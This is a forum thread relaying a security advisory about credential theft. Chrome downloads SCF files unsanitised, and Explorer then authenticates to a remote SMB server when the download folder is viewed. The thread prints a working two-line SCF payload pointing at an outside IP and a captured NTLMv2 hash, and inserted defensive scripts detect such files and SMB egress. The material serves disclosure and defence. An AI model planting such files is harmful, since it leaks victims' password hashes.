Windows 10: Warning: Attackers can Steal Windows Credentials using Google Chrome

Discussion in 'Windows 10 News' started by Brink, May 16, 2017.

  1. Brink
    Brink New Member

    Warning: Attackers can Steal Windows Credentials using Google Chrome


    As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet[3] but does not give the same treatment to SCF files.

    An SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:

    Code:
    [Shell]
    IconFile=\\170.170.170.170\icon
    Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon".

    The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:

    Code:
    [*] SMB Captured - 2017-05-15 13:10:44 +0200
    NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
    USER:Bosko DOMAIN:Master OS: LM:
    LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
    NTHASH:98daf39c3a253bbe4a289e7a746d4b24
    NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
    Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

    The above example shows a disclosure of the victim's username, domain and NTLMv2 password hash.

    It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files...

    Read more: DefenseCode - Home
     
    Brink, May 16, 2017
    #1
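As a defender-side illustration of the SCF pattern in the quoted article, here is an added Python example (not from DefenseCode, Brink, or this thread) that scans a downloads folder for .scf files whose [Shell] IconFile points at a remote UNC host, and also flags the picture.jpg.scf double-extension disguise the article mentions. The temporary folder, the sample files and the 203.0.113.10 host (a documentation address) are constructed for the demonstration.

```python
"""Scan a downloads folder for SCF files whose [Shell] IconFile points at a
remote UNC host, the pattern from the quoted DefenseCode article.
Added example, not from the article or this thread; the sample files and
the 203.0.113.10 host are constructed for the demonstration."""
import re
import tempfile
from pathlib import Path

# \\host\share (or //host/share after normalisation); the host part may be
# an IP address, a hostname or an IPv6 literal.
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def parse_scf(text: str) -> dict:
    """Minimal INI-style parser: {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str):
    """Return the UNC host that IconFile would make Explorer contact, or None
    when the icon is local (explorer.exe,3 style) or absent."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    icon = icon.strip('"').replace("/", "\\")  # Windows accepts either slash
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def scan_downloads(directory) -> list:
    """Report every *.scf under directory that would trigger an outbound SMB
    authentication when the folder is merely viewed in Explorer.
    Each finding is (path, host, has_double_extension)."""
    findings = []
    for path in Path(directory).rglob("*"):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        try:
            host = remote_icon_host(path.read_text(errors="replace"))
        except OSError:
            continue
        if host:
            # picture.jpg.scf is shown as picture.jpg: flag the disguise too.
            double_ext = Path(path.stem).suffix != ""
            findings.append((str(path), host, double_ext))
    return findings


def demo() -> list:
    """Constructed downloads folder: one disguised remote-icon SCF, one benign
    local-icon SCF (the classic 'Show Desktop' file) and an unrelated file
    that carries the same content but not the .scf extension."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "picture.jpg.scf").write_text(
            "[Shell]\nIconFile=\\\\203.0.113.10\\icon\n")
        (root / "Show Desktop.scf").write_text(
            "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
            "[Taskbar]\nCommand=ToggleDesktop\n")
        (root / "notes.txt").write_text(
            "[Shell]\nIconFile=\\\\203.0.113.10\\icon\n")
        return scan_downloads(tmp)


if __name__ == "__main__":
    for path, host, double_ext in demo():
        flag = " (double extension)" if double_ext else ""
        print(f"{path}: IconFile resolves to remote host {host}{flag}")
```

Only the .scf file with a UNC IconFile is reported; the same content under a .txt name is ignored because Explorer keys on the extension, and the Show Desktop file stays clean because its icon lives in a local binary. Point scan_downloads at a real Downloads directory, or at a quarantine share, to audit what a browser has already saved.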
  2. Plankton Win User

    Thanks.....I'm currently using Chrome. I already have that box checked. I will read the whole article when I get some free time. Thanks again for the heads up.

    :)
     
    Plankton, May 16, 2017
    #2
  3. This USB Device Can Steal Information, Even if PC is Locked

    http://anonhq.com/usb-device-steal-information-even-pc-locked/

    Most of you probably already know about this. But I have some questions.

    1) if no user is actively logged in (just the login screen), can the device steal credentials?

    2) If group policy blocks the installation of USB devices, can this device steal credentials?

    Thank you.
     
    LaurFlorin, May 16, 2017
    #3
  4. PJ_96 Win User

    Warning: Attackers can Steal Windows Credentials using Google Chrome

    Cannot access all Google sites like Gmail, Google Search, and Facebook, YouTube.

    What do I do? Went through all that online forums said and still cannot get access to Google and sites like Gmail, Facebook, YouTube on all my browsers such as IE, Edge, Chrome, Firefox.
    1. Windows 10, Chrome, time & date all up to date
    2. Disabled all extensions on all browsers.
    3. Reset all internet settings and deleted all history, caches and everything.
    4. I ran the sites in incognito but got the same error code.
    5. I ran the sites on Firefox and Edge and they can't be accessed either. No browsers can access these sites.
    6. Disabled all antivirus and firewalls on my laptop.
    7. Set up a new Microsoft account and user on my laptop, same problem, can't access those sites only, on all browsers.

    I did all those. And this is still what I get on Edge:

    There’s a problem with this website’s security certificate

    This might mean that someone’s trying to fool you or steal any info you send to the server. You should close this site immediately.


    L: Go to my homepage instead


    Continue to this webpage (not recommended)

    and if I continue to the webpage, it simply can't find the page

    HTTP 404 error That’s odd... Microsoft Edge can’t find this page

    Try this

    • Retype the web address
    • Go back to the last page

    This is what it shows on google chrome,

    Your connection is not private
    Attackers might be trying to steal your information from www.google.com.sg (for example, passwords, messages, or credit cards).



    NET::ERR_CERT_COMMON_NAME_

    www.google.com.sg normally uses encryption to protect your information. When Google Chrome tried to connect to www.google.com.sg this
    time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.google.com.sg, or a Wi-Fi sign-in screen has interrupted
    the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.

    You cannot visit www.google.com.sg right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later. Learn more.

    I am pretty sure that has to do with travelling to China and using the internet there with my laptop. Since all those pages are banned in China, I can't access them now either when I'm back in my home country. Can anyone explain this and what should I do??
     
    PJ_96, May 16, 2017
    #4
  5. gtspeck Win User
    Brink, thanks for the heads up...
     
    gtspeck, May 17, 2017
    #5
  6. cereberus Win User
    And here is the solution

    Block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers cannot query remote SMB servers.
     
    cereberus, May 17, 2017
    #6
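To check whether that egress block is actually in place, and to spot hosts that may already have sent an NTLMv2 response before it was, here is an added Python example (not from this thread) that picks outbound TCP 139/445 attempts from internal addresses to anything outside the site's private ranges out of firewall log lines. The simplified log format, the RFC 1918 ranges assumed as "local", and the sample lines are constructed; 170.170.170.170 is reused from the article's own IconFile example.

```python
"""Find outbound SMB connection attempts (TCP 139/445) from local-network hosts
to addresses outside the site's private ranges: the traffic the egress-block
advice in this thread is meant to stop. Added example, not from the thread;
the log line format and the sample lines are constructed, and
170.170.170.170 is reused from the article's own SCF example."""
import ipaddress
import re
from collections import Counter

SMB_PORTS = {139, 445}

# Assumed site-local ranges (RFC 1918); adjust to the real internal address plan.
LOCAL_NETS = [ipaddress.ip_network(n)
              for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed log shape: <ts> <action> proto=<proto> src=<ip>:<port> dst=<ip>:<port>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>\w+)\s+proto=(?P<proto>\w+)\s+"
    r"src=(?P<src>[^:\s]+):(?P<sport>\d+)\s+dst=(?P<dst>[^:\s]+):(?P<dport>\d+)$")


def parse_line(line: str):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    try:
        rec["src_ip"] = ipaddress.ip_address(rec["src"])
        rec["dst_ip"] = ipaddress.ip_address(rec["dst"])
    except ValueError:
        return None
    rec["dport"] = int(rec["dport"])
    return rec


def is_local(ip) -> bool:
    """True when ip falls inside one of the assumed internal ranges."""
    return any(ip in net for net in LOCAL_NETS)


def is_smb_egress(rec) -> bool:
    """Internal source, SMB destination port, destination outside our ranges."""
    return (rec["proto"].lower() == "tcp"
            and rec["dport"] in SMB_PORTS
            and is_local(rec["src_ip"])
            and not is_local(rec["dst_ip"]))


def find_smb_egress(lines):
    """Return (timestamp, action, src, dst, dport) for every matching line."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_smb_egress(rec):
            hits.append((rec["ts"], rec["action"], str(rec["src_ip"]),
                         str(rec["dst_ip"]), rec["dport"]))
    return hits


def unblocked_sources(lines) -> Counter:
    """Internal hosts whose SMB egress was *allowed*: each is a machine that
    may already have leaked an NTLMv2 response, and evidence that the block
    is not applied on that path."""
    return Counter(src for _, action, src, _, _ in find_smb_egress(lines)
                   if action.lower() == "allow")


SAMPLE_LOG = [  # constructed sample lines
    "2017-05-16T13:10:44+0200 allow proto=tcp src=192.168.1.20:62521 dst=170.170.170.170:445",
    "2017-05-16T13:10:45+0200 allow proto=tcp src=192.168.1.20:62522 dst=170.170.170.170:139",
    "2017-05-16T13:11:02+0200 allow proto=tcp src=192.168.1.20:62530 dst=192.168.1.5:445",
    "2017-05-16T13:11:10+0200 allow proto=tcp src=192.168.1.20:62531 dst=170.170.170.170:443",
    "2017-05-16T13:11:12+0200 block proto=tcp src=10.0.0.7:51000 dst=170.170.170.170:445",
    "2017-05-16T13:11:13+0200 allow proto=udp src=10.0.0.7:137 dst=10.255.255.255:137",
    "malformed line that the parser must skip",
]

if __name__ == "__main__":
    for hit in find_smb_egress(SAMPLE_LOG):
        print("SMB egress:", hit)
    for src, n in unblocked_sources(SAMPLE_LOG).items():
        print(f"{src}: {n} allowed SMB connection(s) to external hosts")
```

Internal-to-internal SMB (the 192.168.1.5 line) and other ports to the same external host (the 443 line) are deliberately not reported, so the output is the egress the firewall rule should be dropping. An "allow" hit after the rule is supposed to be live means the block is missing on that path, and the source host belongs in the incident scope for a credential reset.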
  7. simrick Win User
    Thanks for the heads up Brink.
     
    simrick, Apr 4, 2018
    #7